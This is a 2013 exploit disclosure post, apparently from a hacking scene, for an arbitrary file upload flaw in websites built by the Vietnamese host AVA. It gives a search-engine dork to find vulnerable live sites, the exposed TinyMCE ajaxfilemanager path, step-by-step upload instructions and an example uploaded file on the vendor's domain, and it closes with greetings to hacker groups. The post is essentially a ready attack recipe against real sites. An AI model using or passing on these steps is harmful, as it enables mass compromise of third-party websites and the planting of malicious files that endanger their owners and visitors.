Oktober 05, 2013
#Date : 02/10/2013
#Category : Web Applications
#Vendor : http://ava.vn
#Dork
intext:Thiết kế website bởi AVA Domain Hosting
#Vulnerability : Arbitrary File Upload
#Tested On : Windows 7, Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker, Muslim Hacker
Arbitrary File Upload
http://site-target/addons/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
1. Go to Exploit
2. Click Upload
3. Choose Your File, and Click Upload
Result Upload at
http://site-target/upload/[YOURFILE]
Example :
http://www.ava.vn/upload/mistake.txt
